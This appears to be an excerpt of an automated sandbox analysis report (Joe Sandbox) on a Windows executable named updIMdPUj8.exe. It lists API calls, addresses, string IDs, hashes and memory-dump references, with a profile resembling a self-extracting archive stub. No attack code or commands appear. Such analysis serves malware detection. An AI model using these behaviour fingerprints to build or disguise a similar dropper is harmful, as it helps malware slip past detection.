                                                                                                                                                                          • Opcode ID: 2a0a543f0dbc73cde44ff25cf39a584049eb192569bdbff9923ff88d5a919c7b
                                                                                                                                                                          • Instruction ID: b48a0316cba7a75e6752a44066877519c8a8351324615ba977ac7854b64821a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a0a543f0dbc73cde44ff25cf39a584049eb192569bdbff9923ff88d5a919c7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 8741282154037195C732AF34A852E7F7BE8EF41B44F2449CEF98A6B181EF614E95C391
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00B3CE9D
                                                                                                                                                                            • Part of subcall function 00B2B690: _wcslen.LIBCMT ref: 00B2B696
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3CED1
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,00B6946A), ref: 00B3CEF1
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3CFFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: %s%s%u
                                                                                                                                                                          • API String ID: 110358324-1360425832
                                                                                                                                                                          • Opcode ID: fe84eb72c5d14cc12b68011277eaa69119d88e6d4dd41c2666603c2aac301f53
                                                                                                                                                                          • Instruction ID: 0ef95afaee608b3eb167f1b0e45b507b6a7e1d5276ce19dd3b193503ac713ec6
                                                                                                                                                                          • Opcode Fuzzy Hash: fe84eb72c5d14cc12b68011277eaa69119d88e6d4dd41c2666603c2aac301f53
                                                                                                                                                                          • Instruction Fuzzy Hash: EA4170B1900258AADF259BA0DC85EEE77FCEB04741F6080E6F909E7151EE749E48CF61
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B2A275,?,?,00000800,?,00B2A23A,?,00B2755C), ref: 00B2BBC5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2BC3B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                          • String ID: UNC$\\?\
                                                                                                                                                                          • API String ID: 3341907918-253988292
                                                                                                                                                                          • Opcode ID: 1335a4cd1ed8fc53140304b1e46bd5d310ea36bd00cb582ca7d192b510e04d6f
                                                                                                                                                                          • Instruction ID: 844e5ebd893ed2d7300b3403d5f568b99dd57049c25a28efe0cb6ab99628821f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1335a4cd1ed8fc53140304b1e46bd5d310ea36bd00cb582ca7d192b510e04d6f
                                                                                                                                                                          • Instruction Fuzzy Hash: CD41B271440225B6CF21AF20EC46EEE77E9EF45790F1484E6F859A3151EF70EE94CA60
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadBitmapW.USER32(00000065), ref: 00B3B6ED
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00B3B712
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3B744
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3B767
                                                                                                                                                                            • Part of subcall function 00B3A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6D5
                                                                                                                                                                            • Part of subcall function 00B3A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6EC
                                                                                                                                                                            • Part of subcall function 00B3A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A703
                                                                                                                                                                            • Part of subcall function 00B3A6C2: LockResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A712
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B3B73D,00000066), ref: 00B3A72D
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalLock.KERNEL32(00000000), ref: 00B3A73E
                                                                                                                                                                            • Part of subcall function 00B3A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B3A762
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B3A7A7
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B3A7C6
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalFree.KERNEL32(00000000), ref: 00B3A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 1797374341-3352871620
                                                                                                                                                                          • Opcode ID: 85efe666299f111b36851e9ce7ff3d2ba50e920b6ecd39a3455f5ef092d77cb5
                                                                                                                                                                          • Instruction ID: 2f30ddc0100ea45ab95a1a8fc3a52f0961e4d0e373fe813162587969b3cdc033
                                                                                                                                                                          • Opcode Fuzzy Hash: 85efe666299f111b36851e9ce7ff3d2ba50e920b6ecd39a3455f5ef092d77cb5
                                                                                                                                                                          • Instruction Fuzzy Hash: E301C036540201A7C71277749C0AEBF7AF9EBC0B52F390091FA40B72A5DF75CD0582A2
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3D64B
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B3D661
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B3D675
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00B3D684
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: RENAMEDLG
                                                                                                                                                                          • API String ID: 445417207-3299779563
                                                                                                                                                                          • Opcode ID: eaf6f3501b665678b8bd9af625c5bb52959053704290cb1257f64b8e7b10e9c7
                                                                                                                                                                          • Instruction ID: 297530c8f786bdde1861ed1c1e6b44a6f48c0014eae81a1a14073ba040e8cb5d
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf6f3501b665678b8bd9af625c5bb52959053704290cb1257f64b8e7b10e9c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501B533284214BAD2115F74AD0AF6677EEEB9AF42F210451F615A70E0CAA2A944C769
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B47E24,00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002), ref: 00B47E93
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B47EA6
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B47E24,00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002), ref: 00B47EC9
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: b84344c55d39420ccc04e5a82ce9e9e9b715b1eb94600a14d718f6f27b7fb159
                                                                                                                                                                          • Instruction ID: d370e3b2b260934648e5c10333ee13b73f0b337c1abf3e262dae9624934208ec
                                                                                                                                                                          • Opcode Fuzzy Hash: b84344c55d39420ccc04e5a82ce9e9e9b715b1eb94600a14d718f6f27b7fb159
                                                                                                                                                                          • Instruction Fuzzy Hash: 49F03131940308BBDB119BA0DC09BAEBFF8EB44752F0441E9F805A3260DF719F44DA90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B2F2E4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00B681C8,CryptUnprotectMemory), ref: 00B2F2F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                          • API String ID: 2141747552-1753850145
                                                                                                                                                                          • Opcode ID: 7b2d81a4033eb1a50c93400966922309e87d1e3bb9a41e136e25b42870ec6292
                                                                                                                                                                          • Instruction ID: ee9183d4497a1a0de911b0bd1c705699316e327b8bbdff3c81ea7ce26a41ef10
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b2d81a4033eb1a50c93400966922309e87d1e3bb9a41e136e25b42870ec6292
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE086719107129ED7219F38A85DB167AE4AF04F41F1488EDF4DA93790DAB4D5448F50
                                                                                                                                                                          APIs
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustPointer$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2252061734-0
                                                                                                                                                                          • Opcode ID: f98f7ee3a73d0390ac559da2a766a98c13087fa223bc002f0bb7b83e67856ad3
                                                                                                                                                                          • Instruction ID: 6d3080433e699b827e4c73aed62918eb67fc5dbaf9ca2586fa5013440a6ed815
                                                                                                                                                                          • Opcode Fuzzy Hash: f98f7ee3a73d0390ac559da2a766a98c13087fa223bc002f0bb7b83e67856ad3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4451AF71900216AFDB299F14D885B7A77E4FF54310F6441A9FC01476A2D732AE40FB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B4BF39
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4BF5C
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B4BF82
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BF95
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4BFA4
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: c6db98d2e737274342a469a8cc401b91e51a9b8bc58d450a3023ce0bd6a2f02b
                                                                                                                                                                          • Instruction ID: b4997270056284ac9910984fd33fe4a23e239eed977f5ad83a7b7d83acf2aa5c
                                                                                                                                                                          • Opcode Fuzzy Hash: c6db98d2e737274342a469a8cc401b91e51a9b8bc58d450a3023ce0bd6a2f02b
                                                                                                                                                                          • Instruction Fuzzy Hash: B301D4726017117F272116BA5C9CD7B6AFDDEC2FA131401A9FA08D3200EF60CE05A5B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00B491AD,00B4B188,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4986E
                                                                                                                                                                          • _free.LIBCMT ref: 00B498A3
                                                                                                                                                                          • _free.LIBCMT ref: 00B498CA
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B498D7
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B498E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: de8b13ed1d29176bea34fc34b48fea4709b9b27b159c85acf78debe9a60a7e3d
                                                                                                                                                                          • Instruction ID: 769a9916f2df0e53ccd153c09b54c38db738c1eb8cdfe8999b56b426f15f0d4b
                                                                                                                                                                          • Opcode Fuzzy Hash: de8b13ed1d29176bea34fc34b48fea4709b9b27b159c85acf78debe9a60a7e3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9801F4361957016BC316676C6C89A1B27EADBD2BF273502F8F525A3292EE30CF017221
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B311CF: ResetEvent.KERNEL32(?), ref: 00B311E1
                                                                                                                                                                            • Part of subcall function 00B311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B311F5
                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B30F21
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 00B30F3B
                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00B30F54
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B30F60
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B30F6C
                                                                                                                                                                            • Part of subcall function 00B30FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B31206,?), ref: 00B30FEA
                                                                                                                                                                            • Part of subcall function 00B30FE4: GetLastError.KERNEL32(?), ref: 00B30FF6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1868215902-0
                                                                                                                                                                          • Opcode ID: 6d0d10d304a376e75bcbb40f1b959e8a0da159a250d0bd55a9b66bdbe1248773
                                                                                                                                                                          • Instruction ID: 1881c912fe7a5edd3dc19b2371bb9ec3e4ea22a0d8e6d8e0dbc5775845be7b94
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d0d10d304a376e75bcbb40f1b959e8a0da159a250d0bd55a9b66bdbe1248773
                                                                                                                                                                          • Instruction Fuzzy Hash: 45015271100B44EFC722AB64DC84BC6BBE9FF08B51F1009A9F15A921A0CB757A54CA50
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C817
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C829
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C83B
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C84D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 8644c9f6e2595d6f76021dc24df7f6d5444c32c73b0825a1022fc3c482efd938
                                                                                                                                                                          • Instruction ID: 63f04694f8e8b9f510621596e62af0951fac84d5e620d5c8d2273cb6a5e4edad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8644c9f6e2595d6f76021dc24df7f6d5444c32c73b0825a1022fc3c482efd938
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF06232912210AB86A4DB68E586D2A77E9EA10B1175418EDF118D7552CF70FE80DA54
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B31FE5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B31FF6
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B32006
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B32014
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B2B371,?,?,00000000,?,?,?), ref: 00B3202F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CompareString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3397213944-0
                                                                                                                                                                          • Opcode ID: 1d438d6979b2a62383d7fab04458a084a96f0e07332a9550d287f6c17299e272
                                                                                                                                                                          • Instruction ID: 87446b1ff895cfeadd40afbcdcf6b3384238d6ac9fde0e79d81f76227c0a749a
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d438d6979b2a62383d7fab04458a084a96f0e07332a9550d287f6c17299e272
                                                                                                                                                                          • Instruction Fuzzy Hash: 29F06D32048114BBCF261F50EC09D9E3FA6EB40B70F258085F61A5B061CB729765E6A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B4891E
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B48930
                                                                                                                                                                          • _free.LIBCMT ref: 00B48943
                                                                                                                                                                          • _free.LIBCMT ref: 00B48954
                                                                                                                                                                          • _free.LIBCMT ref: 00B48965
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: be7c7b31bfe17b42c8920d69f40bdae352468a7e9d24db59a9e0fa46fdbf137b
                                                                                                                                                                          • Instruction ID: d3eb4d900a8e90cf2b399e338558726e0bb56079bdb10e143515f297e81e1078
                                                                                                                                                                          • Opcode Fuzzy Hash: be7c7b31bfe17b42c8920d69f40bdae352468a7e9d24db59a9e0fa46fdbf137b
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0DA718116229B868A6F14FC0251D3BE1FB24725301159AF924972B1DF728B41FB81
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _swprintf
                                                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                                                          • API String ID: 589789837-2259941744
                                                                                                                                                                          • Opcode ID: a89effec90cbe5ec2ff75a5966e53caf6f024824d22eaf593717c89a7f9f82db
                                                                                                                                                                          • Instruction ID: 24d653a35b3d94c546307fd6fd6dfa668cdc51ba5875e28699d2e8faaff35726
                                                                                                                                                                          • Opcode Fuzzy Hash: a89effec90cbe5ec2ff75a5966e53caf6f024824d22eaf593717c89a7f9f82db
                                                                                                                                                                          • Instruction Fuzzy Hash: D951AD75288300F6F6221ADC8DC7F3576DDAB05B04F348DC6F39A694E1DDA2A860671E
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\updIMdPUj8.exe,00000104), ref: 00B47FAE
                                                                                                                                                                          • _free.LIBCMT ref: 00B48079
                                                                                                                                                                          • _free.LIBCMT ref: 00B48083
                                                                                                                                                                          Strings
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                          • API String ID: 2506810119-3977522989
